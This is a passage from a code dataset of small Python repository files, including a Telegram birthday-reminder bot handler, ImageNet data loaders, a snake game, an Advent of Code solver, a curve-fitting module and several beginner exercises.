tgbot.filters import BackMenuFilter, EditNoteFilter, ChooseNotificationFilter, ApproveDataFilter\nfrom tgbot.keyboards import add_notification_keyboard, approving_keyboard, after_changes_keyboard\nfrom tgbot.misc.notification_views import long_notification\nfrom tgbot.misc.states import EditNotificationStates, EditPersonStates\nfrom tgbot.middlewares.language_middleware import _\nfrom tgbot.scheduler import get_id_by_name, modify_notification\n\n\n# Хэндлер для меню \"Изменить уведомление\"\nasync def edit_notification_handler(call: CallbackQuery, state: FSMContext):\n text = _(\"Выберите когда напоминать Вам о Дне рождения {name}:\")\n\n await call.answer(cache_time=60)\n data = await state.get_data()\n name = data.get(\"name\")\n await call.message.answer(text=text.format(name=name), reply_markup=add_notification_keyboard())\n await EditNotificationStates.waiting_for_notification_instead.set()\n\n\n# Хэндлер для меню \"Подтвердите введенные данные\"\nasync def check_before_edit_notif_handler(call: CallbackQuery, state: FSMContext):\n text = _(\"Теперь бот будет напоминать Вам о день рождении {name}:\\n\\n\"\n \"{notification}\\n\"\n \"\\n\"\n \"Нажмите кнопку 'Все верно', чтобы сохранить изменения.\")\n\n await call.answer(cache_time=60)\n data = await state.get_data()\n name = data.get(\"name\")\n long_note = await long_notification(call.data)\n await state.update_data(notification=call.data)\n await call.message.answer(text.format(name=name, notification=long_note), reply_markup=approving_keyboard())\n await EditNotificationStates.waiting_for_notification_approve.set()\n\n\n# Хэндлер для завершения редактирования уведомлений с сохранением изменений в БД\nasync def notif_editing_complete_handler(call: CallbackQuery, state: FSMContext, scheduler: ContextSchedulerDecorator):\n text = _(\"Изменения успешно внесены\")\n\n await call.answer(cache_time=60)\n data = await state.get_data()\n name = data.get(\"name\")\n year = data.get(\"year\")\n month = data.get(\"month\")\n day = data.get(\"day\")\n notification = data.get(\"notification\")\n user_id = call.from_user.id\n await update_notifications_in_db(notification=notification, user_id=user_id, name=name)\n await call.message.answer(text=text, reply_markup=after_changes_keyboard())\n onday_id, before_id = await get_id_by_name(scheduler=scheduler, user_id=user_id, name=name)\n await modify_notification(scheduler=scheduler, notification=notification, user_id=user_id, name=name,\n year=year, month=month, day=day, onday_id=onday_id, before_id=before_id)\n await state.finish()\n\n\ndef reg_edit_notification_handlers(dp: Dispatcher):\n # Регистрация хендлеров многоуровнего меню \"Изменить уведомление\"\n dp.register_callback_query_handler(edit_notification_handler, EditNoteFilter(),\n state=EditPersonStates.waiting_for_what_to_edit)\n dp.register_callback_query_handler(check_before_edit_notif_handler, ChooseNotificationFilter(),\n state=EditNotificationStates.waiting_for_notification_instead)\n dp.register_callback_query_handler(notif_editing_complete_handler, ApproveDataFilter(),\n state=EditNotificationStates.waiting_for_notification_approve)\n\n # Регистрация хэндлеров кнопки \"Назад\" в ветке \"Изменить уведомление\"\n dp.register_callback_query_handler(edit_notification_handler, BackMenuFilter(),\n state=EditNotificationStates.waiting_for_notification_approve)\n","repo_name":"MaximAntsiferov/Birthday-Reminder-Telegram-bot","sub_path":"tgbot/handlers/inside_the_list/inside_editing/edit_notification_handlers.py","file_name":"edit_notification_handlers.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"22137530198","text":"import math\r\ndef solve():\r\n n, k = map(int, input().split())\r\n p = 1\r\n ans = 0\r\n mod = 1000000007\r\n \r\n for i in range(32):\r\n if k & (1 << i):\r\n ans = (ans + p) % mod \r\n p *= n\r\n p %= mod\r\n print(ans)\r\n\r\nfor _ in range(int(input())):\r\n solve()\r\n\r\n ","repo_name":"mlabeeb03/codeforces","sub_path":"Special Numbers.py","file_name":"Special Numbers.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12438633071","text":"import sys\n\ninput = sys.stdin.readline\nx, y = map(str, input().split())\n\ndef rev(i):\n i = i[::-1]\n i = int(i)\n return i \n\nprint(rev(str(rev(x)+rev(y))))\n","repo_name":"lyong4432/practice","sub_path":"#1357.py","file_name":"#1357.py","file_ext":"py","file_size_in_byte":162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"374921879","text":"\"\"\"prepare CIFAR and SVHN\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\n\r\nimport sys\r\nimport os\r\nimport glob\r\nimport torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\nfrom torch.utils.data import Dataset\r\nfrom PIL import Image\r\nimport numpy as np\r\nfrom autoaugment import ImageNetPolicy\r\n\r\n\r\ncrop_size = 32\r\npadding = 4\r\n\r\n\r\nclass ImageNet_For_Search(Dataset):\r\n def __init__(self, root, transforms_=None, num_class=100):\r\n self.transform = transforms_\r\n self.files = []\r\n self.labels = []\r\n\r\n # dir_list = np.random.choice(os.listdir(os.path.join(root, mode)), num_class, replace=False)\r\n dir_list = os.listdir(root)[:num_class]\r\n for label, dirname in enumerate(dir_list):\r\n for fname in os.listdir(os.path.join(root, dirname)):\r\n assert 'JPEG' in fname or 'jpg' in fname or 'png' in fname\r\n self.files.append(os.path.join(root, dirname, fname))\r\n self.labels.append(label)\r\n\r\n data_list = list(zip(self.files, self.labels))\r\n np.random.shuffle(data_list)\r\n self.files, self.labels = zip(*data_list)\r\n\r\n self.files = list(self.files)\r\n self.labels = list(self.labels)\r\n\r\n\r\n def __getitem__(self, index):\r\n img = self.transform(Image.open(self.files[index % len(self.files)]).convert('RGB'))\r\n label = self.labels[index % len(self.files)]\r\n \r\n return img, label\r\n\r\n def __len__(self):\r\n # return max(len(self.files), len(self.files_B))\r\n return len(self.files)\r\n\r\n\r\ndef prepare_train_data_for_search(dataset='imagenet', datadir='/home/yf22/dataset', num_class=100):\r\n if 'imagenet' in dataset:\r\n train_dataset = ImageNet_For_Search(\r\n datadir,\r\n transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]), \r\n num_class=num_class)\r\n\r\n else:\r\n train_dataset = None\r\n \r\n return train_dataset\r\n\r\n\r\ndef prepare_test_data_for_search(dataset='imagenet', datadir='/home/yf22/dataset', num_class=100):\r\n if 'imagenet' in dataset:\r\n train_dataset = ImageNet_For_Search(\r\n datadir,\r\n transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]), \r\n num_class=num_class)\r\n\r\n else:\r\n train_dataset = None\r\n \r\n return train_dataset\r\n\r\n\r\ndef prepare_train_data_autoaugment(dataset='imagenet', datadir='/home/yf22/dataset'):\r\n if 'imagenet' in dataset:\r\n train_dataset = torchvision.datasets.ImageFolder(\r\n datadir,\r\n transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n ImageNetPolicy(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]))\r\n\r\n else:\r\n train_dataset = None\r\n \r\n return train_dataset\r\n\r\n\r\ndef prepare_train_data(dataset='imagenet', datadir='/home/yf22/dataset'):\r\n if 'imagenet' in dataset:\r\n train_dataset = torchvision.datasets.ImageFolder(\r\n datadir,\r\n transforms.Compose([\r\n transforms.RandomResizedCrop(224),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]))\r\n\r\n else:\r\n train_dataset = None\r\n \r\n return train_dataset\r\n\r\n\r\ndef prepare_test_data(dataset='imagenet', datadir='/home/yf22/dataset'):\r\n\r\n if 'imagenet' in dataset:\r\n test_dataset = torchvision.datasets.ImageFolder(datadir, transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n std=[0.229, 0.224, 0.225])\r\n ]))\r\n\r\n else:\r\n test_dataset = None\r\n\r\n return test_dataset\r\n","repo_name":"GATECH-EIC/Auto-NBA","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"3385914031","text":"from turtle import Turtle\n\nSEG_SIZE = 20\nMOVE_DISTANCE = 20\nUP = 90\nDOWN = 270\nLEFT = 180\nRIGHT = 0\n\n\nclass Snake:\n def __init__(self, size):\n self.size = size\n self.segments = []\n self.create_snake()\n self.head = self.segments[0]\n\n def create_snake(self):\n for i in range(self.size):\n seg = self.new_seg()\n seg.goto(i * -SEG_SIZE, 0)\n self.segments.append(seg)\n\n def new_seg(self):\n seg = Turtle()\n seg.shape(\"square\")\n seg.color(\"white\")\n seg.penup()\n return seg\n\n def eat(self):\n seg = self.new_seg()\n last_one_pos = self.segments[-1].pos()\n seg.goto(last_one_pos)\n self.segments.append(seg)\n\n def move(self):\n for i in range(len(self.segments) - 1, 0, -1):\n self.segments[i].setpos(self.segments[i - 1].pos())\n self.segments[0].fd(MOVE_DISTANCE)\n\n def up(self):\n if self.head.heading() != DOWN:\n self.head.setheading(UP)\n\n def down(self):\n if self.head.heading() != UP:\n self.head.setheading(DOWN)\n\n def left(self):\n if self.head.heading() != RIGHT:\n self.head.setheading(LEFT)\n\n def right(self):\n if self.head.heading() != LEFT:\n self.head.setheading(RIGHT)\n","repo_name":"ax2024/python100","sub_path":"d20/snake_game/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7557111419","text":"from math import floor, ceil\nfrom copy import deepcopy\n\n\nclass SnailNumber:\n def __init__(self, left, right, depth=0):\n self.left = left\n self.right = right\n self.depth = depth\n self.parent = None\n\n def find_explosion(self):\n if isinstance(self.left, SnailNumber):\n if self.left.depth < 4:\n explosion = self.left.find_explosion()\n if explosion is not None:\n return explosion\n else:\n return self.left\n\n if isinstance(self.right, SnailNumber):\n if self.right.depth < 4:\n explosion = self.right.find_explosion()\n if explosion is not None:\n return explosion\n else:\n return self.right\n return None\n\n def find_split(self):\n if isinstance(self.left, int):\n if self.left >= 10:\n return self\n else:\n split = self.left.find_split()\n if split is not None:\n return split\n\n if isinstance(self.right, int):\n if self.right >= 10:\n return self\n else:\n split = self.right.find_split()\n if split is not None:\n return split\n\n return None\n\n def update_left_neighbour(self, value):\n if self.parent is not None:\n if self is self.parent.right:\n if isinstance(self.parent.left, SnailNumber):\n to_update = self.parent.left\n while isinstance(to_update.right, SnailNumber):\n to_update = to_update.right\n to_update.right += value\n else:\n self.parent.left += value\n else:\n to_update = self\n while to_update == to_update.parent.left:\n to_update = to_update.parent\n if to_update.parent is None:\n return\n to_update = to_update.parent\n if isinstance(to_update.left, SnailNumber):\n to_update = to_update.left\n while isinstance(to_update.right, SnailNumber):\n to_update = to_update.right\n to_update.right += value\n else:\n to_update.left += value\n\n def update_right_neighbour(self, value):\n if self.parent is not None:\n if self is self.parent.left:\n if isinstance(self.parent.right, SnailNumber):\n to_update = self.parent.right\n while isinstance(to_update.left, SnailNumber):\n to_update = to_update.left\n to_update.left += value\n else:\n self.parent.right += value\n else:\n to_update = self\n while to_update == to_update.parent.right:\n to_update = to_update.parent\n if to_update.parent is None:\n return\n to_update = to_update.parent\n if isinstance(to_update.right, SnailNumber):\n to_update = to_update.right\n while isinstance(to_update.left, SnailNumber):\n to_update = to_update.left\n to_update.left += value\n else:\n to_update.right += value\n\n def update_depth(self):\n self.depth += 1\n if isinstance(self.left, SnailNumber):\n self.left.update_depth()\n if isinstance(self.right, SnailNumber):\n self.right.update_depth()\n\n def magnitude(self):\n left = 0\n right = 0\n if isinstance(self.left, SnailNumber):\n left += 3 * self.left.magnitude()\n else:\n left += 3 * self.left\n if isinstance(self.right, SnailNumber):\n right += 2 * self.right.magnitude()\n else:\n right += 2 * self.right\n return left + right\n\n\ndef parse_snail_number(line, depth=0):\n # if line starts with number, we have a value\n if line[0] != '[':\n return int(line)\n else:\n # find split between left and right part of snail number\n stack = []\n last_comma = -1\n for i, char in enumerate(line):\n if char == ',':\n stack.append(i)\n elif char == ']':\n last_comma = stack.pop()\n snail_number = SnailNumber(parse_snail_number(line[1:last_comma], depth + 1),\n parse_snail_number(line[last_comma + 1:-1], depth + 1))\n\n if isinstance(snail_number.left, SnailNumber):\n snail_number.left.parent = snail_number\n if isinstance(snail_number.right, SnailNumber):\n snail_number.right.parent = snail_number\n snail_number.depth = depth\n return snail_number\n\n\ndef read_input():\n snail_numbers = []\n with open(\"input18.txt\") as f:\n for line in f:\n snail_numbers.append(parse_snail_number(line[:-1]))\n return snail_numbers\n\n\ndef explode(to_explode):\n to_explode.update_left_neighbour(to_explode.left)\n to_explode.update_right_neighbour(to_explode.right)\n\n if to_explode == to_explode.parent.left:\n to_explode.parent.left = 0\n else:\n to_explode.parent.right = 0\n\n\ndef split(to_split):\n if isinstance(to_split.left, int) and to_split.left >= 10:\n left = floor(to_split.left / 2)\n right = ceil(to_split.left / 2)\n to_split.left = SnailNumber(left, right, to_split.depth + 1)\n to_split.left.parent = to_split\n\n else:\n left = floor(to_split.right / 2)\n right = ceil(to_split.right / 2)\n to_split.right = SnailNumber(left, right, to_split.depth + 1)\n to_split.right.parent = to_split\n\n\ndef reduce(snail_number):\n reduced = False\n while not reduced:\n # check for explosion\n to_explode = snail_number.find_explosion()\n if to_explode is not None:\n explode(to_explode)\n continue\n # check for split\n to_split = snail_number.find_split()\n if to_split is not None:\n split(to_split)\n continue\n reduced = True\n return snail_number\n\n\ndef add_snail_numbers(snail1, snail2):\n snail1.update_depth()\n snail2.update_depth()\n add_snail = SnailNumber(snail1, snail2)\n snail1.parent = add_snail\n snail2.parent = add_snail\n return add_snail\n\n\ndef part1():\n snail_numbers = read_input()\n cur_number = snail_numbers[0]\n for i in range(1, len(snail_numbers)):\n addition = add_snail_numbers(cur_number, snail_numbers[i])\n cur_number = reduce(addition)\n return cur_number.magnitude()\n\n\ndef part2():\n magnitudes = []\n snail_numbers = read_input()\n for i in range(len(snail_numbers)):\n for j in range(len(snail_numbers)):\n if i != j:\n addition = add_snail_numbers(snail_numbers[i], snail_numbers[j])\n addition = reduce(addition)\n magnitudes.append(addition.magnitude())\n\n # restore snail_numbers\n snail_numbers = read_input()\n return max(magnitudes)\n\nprint(part2())","repo_name":"mateosierens/AdventOfCode2021","sub_path":"Day18.py","file_name":"Day18.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18414325412","text":"#!/usr/bin/env python\n# -*- coding: ascii -*-\n\nr\"\"\"\nLinCurveFit fits a DataSet object to a linear sum of functions in x.\n\nUses the scipy.linalg.lstsq method to do a least squares curve fit.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom builtins import object\nfrom past.utils import old_div\n\n#\n# import statements here. (built-in first, then 3rd party, then yours)\nfrom numpy import dot, std, array, double, isfinite, corrcoef, ones, linspace, logspace, log10, column_stack\nfrom numpy import absolute, zeros, isnan, ma\nfrom scipy import linalg\nfrom scipy.optimize import leastsq\nimport numexpr\n\nfrom .helper_funcs import bestFloatStr, INFINITY, fortran_doubleStr\n\ninverseD = {'y':'y', '1/y':'1/(y)', 'log(y)':'exp(y)', 'exp(y)':'log(y)', \n 'log(1/y)':'1/exp(y)', 'exp(1/y)':'1/log(y)', \n '1/log(y)':'exp(1/(y))', '1/exp(y)':'log(1/(y))',\n 'y**2':'(y)**0.5', 'y**3':'(y)**(1./3.)', 'y**4':'(y)**0.25'}\n\n\ndef un_transform_y( y, ytran ):\n \n if ytran=='y':\n return y\n else:\n return numexpr.evaluate( inverseD[ytran] )\n\ndef eval_xrange( cArr, xArr, eqnStr ):# assume that eqnStr startswith \"y = \" \n # make special case for constant-only\n if 'x' not in eqnStr and 'c0' in eqnStr:\n return cArr[0] * ones(len(xArr))\n s = eqnStr[4:]\n cD = {'x':xArr} # dictionary for c0, c1, etc.\n for i,c in enumerate(cArr): # build local_dict to execute numexpr in\n cD['c%i'%i] = cArr[i]\n \n #if '/x'in eqnStr and ma.masked_equal(xArr, 0.0).any():\n # print 'Divide by Zero Warning...'\n # print 'evaluating s=',s\n # print 'eval=',numexpr.evaluate( s, local_dict=cD )\n \n return numexpr.evaluate( s, local_dict=cD )\n\nclass LinCurveFit(object):\n \"\"\"LinCurveFit fits a DataSet object to a linear sum of functions in x.\"\"\"\n\n @property\n def name(self):\n return self.get_eqn_str_w_consts()\n\n def eval_xrange(self, xPlotArr):\n return eval_xrange( self.cArr, xPlotArr, self.get_eqn_str_w_consts() )\n\n def __init__(self, ds, xtranL=None, ytran='y', fit_best_pcent=1,# e.g. ['const', 'x', 'x**2'] \n cArrInp=None): # if cArrInp, then skip cArr calc and jump straight to std calc\n \"\"\"Inits and fits DataSet, ds, to xtranL\"\"\"\n \n self.fit_best_pcent = fit_best_pcent\n self._xymath_type = 'linfit'\n \n self.ds = ds # DataSet object\n self.dsTimeStamp = None # set to self.ds.timeStamp in calc_std_values_from_cArr\n self.xtranL = xtranL # list of x transformations\n self.ytran = ytran # can be 'y', '1/y', 'log(y)', etc.\n \n self.eqn_str_w_consts = None\n self.eqn_str_w_numbs = None\n self.corrcoef = 0.0\n self.std = None\n self.pcent_std = None\n \n # ONLY calc cArr if it is not input\n if cArrInp is None: # if constants are input, simply use them\n # First make good estimate of solution using matrix methods\n try:\n if self.fit_best_pcent:\n #print 'Getting A,y for pcent_std, xtranL, ytran=',xtranL, ytran\n A,y = ds.get_pcent_std_A_matrix( xtranL, ytran )\n else:\n #print 'Getting A,y for std, xtranL, ytran=',xtranL, ytran\n A,y = ds.get_A_matrix( xtranL, ytran )\n \n #print 'A=\\n',A \n #print 'y=',y\n self.cArr, resid, rank, sArr = linalg.lstsq(A, y)\n \n except:\n self.cArr = ones( len(xtranL) )\n\n #print 'ds.wtArr=, ytran=',(ds.wtArr, ytran)\n #print \"ytran!='y'\",ytran!='y'\n #print \"ds.wtArr is None\",ds.wtArr is None\n \n # To stay true to selection of \"Total Error\" or \"Percent Error\"\n # need to tweek matrix answer via leastsq approach.\n # Using good estimate of cArr from above, now use optimize leastsq\n if (not ds.wtArr is None) or ytran!='y':\n # After using matrix methods to estimate constants, use optimize.leastsq\n X = column_stack([ self.ds.getTransXArr(name) for name in self.xtranL ])\n \n def ss_func( cArr ):\n ytranArr = dot( X, cArr )\n yCalcArr = un_transform_y( ytranArr, self.ytran )\n \n if not self.ds.wtArr is None:\n #print 'Doing Linear fit with wtArr'\n if fit_best_pcent:\n return self.ds.wtArr * (yCalcArr - self.ds.yArr)/self.ds.yPcentDivArr\n else:\n return self.ds.wtArr * (yCalcArr - self.ds.yArr)\n else:\n if fit_best_pcent:\n return old_div((yCalcArr - self.ds.yArr),self.ds.yPcentDivArr)\n else:\n return yCalcArr - self.ds.yArr\n \n #print 'self.cArr Before =',self.cArr\n #print ' Before std=',self.std,' pcent_std=',self.pcent_std\n minResult = leastsq( ss_func, self.cArr)\n #print 'minResult =',minResult\n \n self.cArr = minResult[0]\n else:\n self.cArr = array(cArrInp, dtype=double)\n\n self.calc_std_values_from_cArr()\n \n \n def calc_std_values_from_cArr(self):\n if self.dsTimeStamp == self.ds.timeStamp:\n print('std and pcent_std left unchanged')\n return\n \n # First set LinCurveFit timeStamp to ds.timeStamp\n self.dsTimeStamp = self.ds.timeStamp\n self.corrcoef = 0.0 # in case it bombs show zero\n try:\n # if y is transformed, must un_transform_y\n X = column_stack([ self.ds.getTransXArr(name) for name in self.xtranL ])\n ytranArr = dot( X, self.cArr )\n self.yCalcArr = un_transform_y( ytranArr, self.ytran )\n #if self.fit_best_pcent:\n # self.yCalcArr *= ds.yArr\n \n self.corrcoef = corrcoef(self.yCalcArr, self.ds.yArr)[0][-1]\n if isnan(self.corrcoef):\n self.corrcoef = 0.0\n \n errArr = self.ds.yArr - self.yCalcArr\n \n self.std = std( errArr ) # Calc standard deviation\n except:\n self.std = INFINITY\n \n try:\n self.pcent_std = 100.0 * std( old_div(errArr,self.ds.yPcentDivArr) )\n if not isfinite( self.pcent_std ):\n self.pcent_std = INFINITY\n except:\n self.pcent_std = INFINITY\n\n def get_x_plot_array(self, Npoints=100, logScale=0, xmin=None, xmax=None):\n \n if xmin is None:\n xmin = self.ds.xmin\n \n if xmax is None:\n xmax = self.ds.xmax\n \n if logScale:\n xPlotArr = logspace(log10(xmin), log10(xmax), num=Npoints)\n else:\n xPlotArr = linspace(xmin, xmax, num=Npoints)\n return xPlotArr\n\n def get_xy_plot_arrays(self, Npoints=100, logScale=0, xmin=None, xmax=None):\n xPlotArr = self.get_x_plot_array(Npoints=Npoints, logScale=logScale, \n xmin=xmin, xmax=xmax)\n yPlotArr = self.eval_xrange( xPlotArr )\n return xPlotArr, yPlotArr\n \n def is_good_over_plot_range(self):\n '''Check for nan in plot range'''\n xPlotArr, yPlotArr = self.get_xy_plot_arrays()\n return not isnan(yPlotArr).any()\n\n def get_eqn_str_w_consts(self):\n if self.eqn_str_w_consts:\n return self.eqn_str_w_consts\n \n rhsL = []\n for i, xstr in enumerate( self.xtranL ):\n if '1/x' in xstr:\n rhsL.append( xstr.replace('1/x', 'c%i/x'%i) )\n else:\n rhsL.append( 'c%i*%s'%(i, xstr) )\n \n rhs = ' + '.join( rhsL )\n rhs = rhs.replace('*const','')\n \n invStr = inverseD[self.ytran]\n \n if '/y' in invStr:\n self.eqn_str_w_consts = 'y = ' + invStr.replace('y', '(%s)'%rhs)\n else:\n self.eqn_str_w_consts = 'y = ' + invStr.replace('y', rhs)\n \n #self.eqn_str_w_consts = self.eqn_str_w_consts.replace('**','^')\n return self.eqn_str_w_consts\n\n def get_eqn_str_w_numbs(self):\n if self.eqn_str_w_numbs:\n return self.eqn_str_w_numbs\n \n if not self.eqn_str_w_consts:\n self.get_eqn_str_w_consts()\n \n self.eqn_str_w_numbs = self.eqn_str_w_consts\n for i,c in enumerate( self.cArr ):\n starg = 'c%i'%i\n self.eqn_str_w_numbs = self.eqn_str_w_numbs.replace(starg, '%s'%self.cArr[i])\n \n self.eqn_str_w_numbs = self.eqn_str_w_numbs.replace(' + -',' - ')\n return self.eqn_str_w_numbs\n\n def get_fortran_eqn_str_w_numbs(self):\n if not self.eqn_str_w_consts:\n self.get_eqn_str_w_consts()\n \n self.eqn_str_w_numbs = self.eqn_str_w_consts\n for i,c in enumerate( self.cArr ):\n starg = 'c%i'%i\n self.eqn_str_w_numbs = self.eqn_str_w_numbs.replace(starg, fortran_doubleStr(self.cArr[i]))\n \n self.eqn_str_w_numbs = self.eqn_str_w_numbs.replace(' + -',' - ')\n return self.eqn_str_w_numbs\n\n def get_full_description(self):\n \"\"\"Returns a full summary of LinCurveFit.\"\"\"\n if not self.eqn_str_w_consts:\n self.get_eqn_str_w_consts()\n \n sL = [self.eqn_str_w_consts]\n for i,c in enumerate( self.cArr ):\n sL.append(' c%i = %s'%(i, bestFloatStr(c) ) )\n \n def get_desc( name, units ):\n if name:\n if units:\n return '%s (%s)'%(name, units)\n else:\n return name\n else:\n return units\n \n if self.ds.xName:\n sL.append(' x = %s'%get_desc(self.ds.xName, self.ds.xUnits) )\n if self.ds.yName:\n sL.append(' y = %s'%get_desc(self.ds.yName, self.ds.yUnits) )\n \n if isnan(self.corrcoef):\n sL.append(' Correlation Coefficient = Undefined' )\n else:\n sL.append(' Correlation Coefficient = %s'%bestFloatStr(self.corrcoef) )\n \n sL.append(' Standard Deviation = %s'%bestFloatStr(self.std) )\n sL.append(' Percent Standard Deviation = %s%%'%bestFloatStr(self.pcent_std) )\n sL.append('%s'%self.get_eqn_str_w_numbs() )\n \n return '\\n'.join( sL )\n\nif __name__=='__main__':\n from numpy import array, double\n from .dataset import DataSet\n \n xArr = array( [1,2,3,4,5,6], dtype=double)\n yArr = array( [10,5.49,0.89,-.14,-1.07,0.84], dtype=double)\n \n C = DataSet(xArr, yArr, xName='fiddle', yName='faddle')\n lf = LinCurveFit( C, ['const', 'x', 'x**2'])\n \n print(lf.get_full_description())\n print()\n #print \"INFINITY =\", bestFloatStr(INFINITY)\n print()\n \n \n lf2 = LinCurveFit( C, ['1/x', 'x'], ytran='1/y')\n \n print(lf2.get_full_description())\n print()\n \n # y = 3.3888 + 0.3725*x\n xArr3 = array( [1, 3, 5, 7, 10, 12, 13, 16, 18, 20], dtype=double)\n yArr3 = array( [4, 5, 6, 5, 8, 7, 6, 9, 12, 11], dtype=double)\n C3 = DataSet(xArr3, yArr3, xName='LaDee', yName='Daa', xUnits='inches', yUnits='degF')\n lf3 = LinCurveFit( C3, ['const', 'x'])\n print(lf3.get_full_description())\n print()\n\n","repo_name":"sonofeft/XYmath","sub_path":"xymath/linfit.py","file_name":"linfit.py","file_ext":"py","file_size_in_byte":11642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"29872520382","text":"# 06 함수의_기초_02\n# 다음과 같이 사용자 2명으로부터 가위, 바위, 보를 입력 받아\n# 위, 바위, 보 규칙이 정의된 함수를 이용해 승패를 결정하는 코드를 작성하십시오.\n\n# input = \n# 홍길동\n# 이순신\n# 가위\n# 바위\n# output = 바위가 이겼습니다!\n\nrsp = ['가위', '바위', '보']\n\ndef play_RSP():\n Player1 = input('Player1: ')\n Player2 = input('Player2: ')\n RSP_1 = input('Player1_RSP: ')\n RSP_2 = input('Player2_RSP: ')\n return RSP_1, RSP_2\n\ndef RSP_result(play_rsp):\n if play_rsp[0] == rsp[0]:\n if play_rsp[1] == rsp[1]:\n result = '바위가 이겼습니다!'\n elif play_rsp[1] == rsp[2]:\n result = '가위가 이겼습니다!'\n \n elif play_rsp[0] == rsp[1]:\n if play_rsp[1] == rsp[0]:\n result = '바위가 이겼습니다!'\n elif play_rsp[1] == rsp[2]:\n result = '보가 이겼습니다!'\n\n elif play_rsp[0] == rsp[2]:\n if play_rsp[1] == rsp[0]:\n result = '가위가 이겼습니다!'\n elif play_rsp[1] == rsp[1]:\n result = '보가 이겼습니다!'\n \n elif play_rsp[0] == play_rsp[1]:\n result = '비겼습니다!'\n \n elif play_rsp[0] != rsp or play_rsp[1] != rsp:\n result = 'Error'\n\n return result\n\n\nRSP = play_RSP()\nrsp_result = RSP_result(RSP)\n\nprint(rsp_result)","repo_name":"essk13/Algorithm","sub_path":"01_problem/python/2021/07/0718/06 예제_02.py","file_name":"06 예제_02.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8863744031","text":"#!/usr/bin/env python\n\nfrom pyresparser import ResumeParser\nimport nltk\nimport spacy\nimport pandas as pd\n# import sys\n\n\n# fileurl = sys.argv[1]\nfileurl = './cv/01_rahul.pdf'\nnltk.download('stopwords')\nspacy.load('en_core_web_sm')\n# data = ResumeParser(str(fileurl)).get_extracted_data()\ndata = ResumeParser(fileurl).get_extracted_data()\n\nname = data['name']\nemail = data['email']\nexp = int(data['total_experience'])\nif exp !=0: emp = 1\nelse: emp = 0\nprev_emp = data['designation']\n\nno_prev = len(prev_emp)\nif no_prev != 0 and exp == 0:\n exp = no_prev+1\n# for i in prev_emp:\n# if i.include('Manager') or i.include('Associate') or i.include('Developer') or i.include('Head'):\n# no_prev +=1\nedu = data['degree']\nedu_lvl = len(edu)\n\napdata = [exp, emp, no_prev, edu_lvl, 0, 0]\napid = fileurl.split('_')\napid = apid[0].split('/')\napid = apid[2]\n","repo_name":"Aakarsh-verma/Alegria-Hackathon-Hiring-Webapp","sub_path":"src/applicant/cvreader.py","file_name":"cvreader.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"28807320728","text":"import sys\nf = open(sys.argv[1], 'r')\n\nk = int(f.readline())\n\nlong_lines = [''] * k\n\nline_number = 0\nfor this_line in f:\n # if we haven't read k lines let, than this line should go in the\n # stack\n if line_number < k:\n long_lines.append(this_line.strip())\n line_number += 1\n continue\n # once we fill our stack, we need to sort it because we depend on\n # this fact later\n if line_number == k:\n long_lines.sort(key=len)\n long_lines.reverse()\n # continue processing\n if len(this_line.strip()) > len(long_lines[k-1]):\n # insert this line into long lines at a point in the list\n # such that it is still sorted\n idx = k - 1\n while idx > 0 and len(long_lines[idx-1]) < len(this_line.strip()):\n idx -= 1\n long_lines = long_lines[:idx] + [this_line.strip()] + long_lines[idx:-1]\n line_number += 1\n\n# print out the longest lines\nfor line in long_lines:\n print(line)\n","repo_name":"tnez/code-eval-submissions","sub_path":"longest-lines/submission.py3","file_name":"submission.py3","file_ext":"py3","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23463597979","text":"#!/usr/bin/python3\n\ndef isValid(s: str) -> bool:\n dicts = {')':'(',']':'[','}':'{'}\n stack = []\n if len(s) % 2 == 1:\n return False\n for i in s:\n if stack and i in dicts:\n if stack[-1] == dicts[i]:\n stack.pop()\n else:\n return False\n else:\n stack.append(i)\n return not stack\n\nif __name__ == '__main__':\n str = \"()\"\n 